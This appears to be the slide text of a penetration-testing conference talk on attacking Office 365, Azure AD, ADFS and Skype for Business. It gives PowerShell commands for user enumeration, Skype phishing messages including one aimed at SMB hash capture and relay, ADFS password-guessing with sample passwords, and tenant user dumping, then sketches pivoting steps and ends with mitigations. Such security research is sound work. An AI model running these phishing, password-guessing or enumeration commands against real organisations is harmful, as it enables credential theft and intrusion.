    Setting Up YourTest Environment • Install the Azure AD PowerShell Module • https://msdn.microsoft.com/en- us/library/azure/jj151815(v=azure.98).aspx
  • 33.
  • 34.
    User Enumeration • Wehave: ‒ Some Targets/Endpoints ‒ A testing environment • We need: ‒ Some users to attack • Enumerate some users for the organization off of LinkedIn • Use one of the many recon frameworks • Check out the User enumeration work that nyxgeek spoke about on Friday
  • 35.
  • 36.
    Email Validation andSE Recon • Using our federated Skype, we can find information about other federated Skype users • Just open a chat with them
  • 37.
    Email Validation andSE Recon • Or we can just chat with these CEOs
  • 38.
    Email Validation andSE Recon • Let’s just wrap it with PowerShell instead Get-SkypeStatus -inputFile test_emails.txt | ft -AutoSize
  • 39.
  • 40.
    Email Validation andSE Recon Demo • Get-SkypeStatus -inputFile "C:TempLiveAdmins.txt" | ft -AutoSize • It helps if we run it a couple of times…
  • 41.
  • 42.
    Email Validation andSE Recon • What about the top 1 million Alexa sites • Of those 47,455 “ms=ms*” records ‒ 45 have “Administrator” accounts that have federated Skype for Business accounts ‒ None of those were actively online during testing… ‒ From nyxgeek: • 38,658 (3.8%) have hostname http://lyncdiscover.domain.com • 486 of 995 unique (Fortune 1000 - 2015) domain names • Note: ‒ Skype doesn’t like opening 2,000+ conversations at a time
  • 43.
  • 44.
    Skype Message Phishing Send-SkypeMessage -email[email protected] -message "What's your password?" Get-SkypeStatus -inputFile 'C:Emails.txt' | Select Email,Status | where Status -Match "Available" | select Email | Send-SkypeMessage …
  • 45.
    Email Validation andSE Recon Demo • Get-SkypeStatus -email [email protected] • Invoke-SendSkypeMessage -email [email protected] -message "Hello from Derbycon" • for ($i = 0; $i -lt 10; $i++){Invoke- SendSkypeMessage -email [email protected] -message "Hello $i"}
  • 46.
  • 47.
  • 48.
    Email Validation andSE Recon Demo • Invoke-SendSkypeMessage -email [email protected] - message "192.168.1.123test” • Invoke-SendSkypeMessage -email [email protected] - message “www.microsoftsupport.online" • SMB capture/relay running on internal network • UNC works on internal, HRefs work for external • Send this message out to a group, get or relay hashes
  • 49.
    Skype Message Phishing •Further Work ‒ Grab a domains worth of phone numbers • Got this working while making these slides… • Should work if you already have creds ‒ Brute-Forcing Skype Creds • Not easy with the Lync SDK • Nyxgeek has some great methods that will be added to PowerSkype
  • 50.
  • 51.
    Dictionary Attacks AgainstADFS • Get-ADFSEndpoint gives us the appropriate command to run for the domain ‒ Federated Domain
  • 52.
    Dictionary Attacks AgainstADFS • Invoke-ADFSSecurityTokenRequest* Invoke-ADFSSecurityTokenRequest -ClientCredentialType UserName -ADFSBaseUri https://adfs.example.com/ -AppliesTo https://adfs.example.com/adfs/services/trust/13/usernamemixed -UserName 'karl.fosaaen‘ -Password 'Winter2016‘ -Domain ‘example.com‘ -OutputType Token -SAMLVersion 2 -IgnoreCertificateErrors https://blogs.msdn.microsoft.com/besidethepoint/2012/10/17/request-adfs-security- token-with-powershell/
  • 53.
    Dictionary Attacks AgainstADFS • Get-ADFSEndpoint gives us the appropriate command to run for the domain ‒ Microsoft Managed Domain
  • 54.
    Dictionary Attacks AgainstADFS • Connect-msolservice – AzureAD PS Module
  • 55.
  • 56.
    Enumeration of OtherDomain Users • Not totally necessary, but it can be handy 1. $msolcred = get-credential 2. connect-msolservice -credential $msolcred 3. Get-MsolUser -All | ft –AutoSize • This also works for apps using AzureAD for account management
  • 57.
    Enumeration of OtherDomain Users • Using the Graph API
  • 58.
    Enumeration of OtherDomain Users • Using the Graph API $token = Get-GraphAPIToken -TenantName DOMAIN_GOES_HERE Get-GraphData -Token $token -Tenant DOMAIN_GOES_HERE -Resource users ‒ This works for federated and managed domains • Github – https://github.com/NetSPI/PowerShell/blob/master/Get- GraphAPIToken.ps1
  • 59.
    Enumeration of OtherDomain Users Demo • $token = Get-GraphAPIToken -TenantName microsoftsupport.online • Get-GraphData -Token $token -Tenant microsoftsupport.online -Resource users
  • 60.
  • 61.
    Enumeration of OtherDomain Users • Use Exchange online for non-MS managed domains • If the domain uses Office365, you can connect to it with PowerShell
  • 62.
    Enumeration of OtherDomain Users • Use Exchange online for non-MS managed domains (1/2) $PWord = ConvertTo-SecureString -String 'Summer2016' -AsPlainText –Force $credentials = New-Object -TypeName "System.Management.Automation.PSCredential " -ArgumentList "[email protected]", $PWord
  • 63.
    Enumeration of OtherDomain Users • Use Exchange online for non-MS managed domains that have OWA tied to O365 (2/2) Invoke-Command -ConfigurationName Microsoft.Exchange -ConnectionUri https://outlook.office365.com/powershell-liveid/ -Credential $Credentials -Authentication Basic -AllowRedirection -ScriptBlock {Get-Recipient -ResultSize unlimited} | Export-CSV c:tempemail_users.csv -NoTypeInformation
  • 64.
  • 65.
    Pivoting to theInternal Network
  • 66.
    Pivoting to theInternal Network • Single Factor VPN Example ‒ Enumerated user emails on LinkedIn ‒ Guessed passwords against MSOnline with PowerShell ‒ Enumerated VPN interfaces ‒ Logged in with guessed credentials ‒ GPP -> Local admin on DA system ‒ DCSync • “Store passwords using reversible encryption”
  • 67.
    Pivoting to theInternal Network • Other Routes ‒ Single Factor Services • Management Protocols • RDP • SSH • Sharepoint • Terminal Services – Web Based • Citrix • VDI • Etc.
  • 68.
    Pivoting to theInternal Network • Malicious OneDrive Documents ‒ Can’t use macros in the online version of excel
  • 69.
    Pivoting to theInternal Network • Malicious SharePoint Documents ‒ Same concept as OneDrive, just a different platform ‒ Backdoor a document ‒ Edit pages
  • 70.
    Pivoting to theInternal Network • Send messages from OWA or Skype for Business ‒ Autodiscover is handy ‒ People will trust their co-workers • “Can you look over this word doc for me?”
  • 71.
    Pivoting to theInternal Network • Attacking Email Accounts ‒ If Autodiscover is enabled, adding an account can be done from anywhere ‒ Email is interesting, but I’d like a shell ‒ This can not be done programmatically with PowerShell (*Easily) ‒ “Malicious Outlook Rules” • Nick Landers – Silent Break Security ‒ “MAPI over HTTP and Mailrule Pwnage” • Etienne - sensepost
  • 72.
  • 73.
    Attack Mitigations • EnableDual factor authentication for external endpoints* *On all channels
  • 74.
    Attack Mitigations • Limitfederation to trusted domains • Limit exposed services surface area • Monitor your Federated and Azure endpoints • Enforce strong password requirements
  • 75.
    Thanks! • My NetSPICo-workers ‒ QA/Ideas/Suggestions • My NetSPI Management Team ‒ For giving me time to work on this • Jared Bird - @jaredbird ‒ For asking me about federation years ago
  • 76.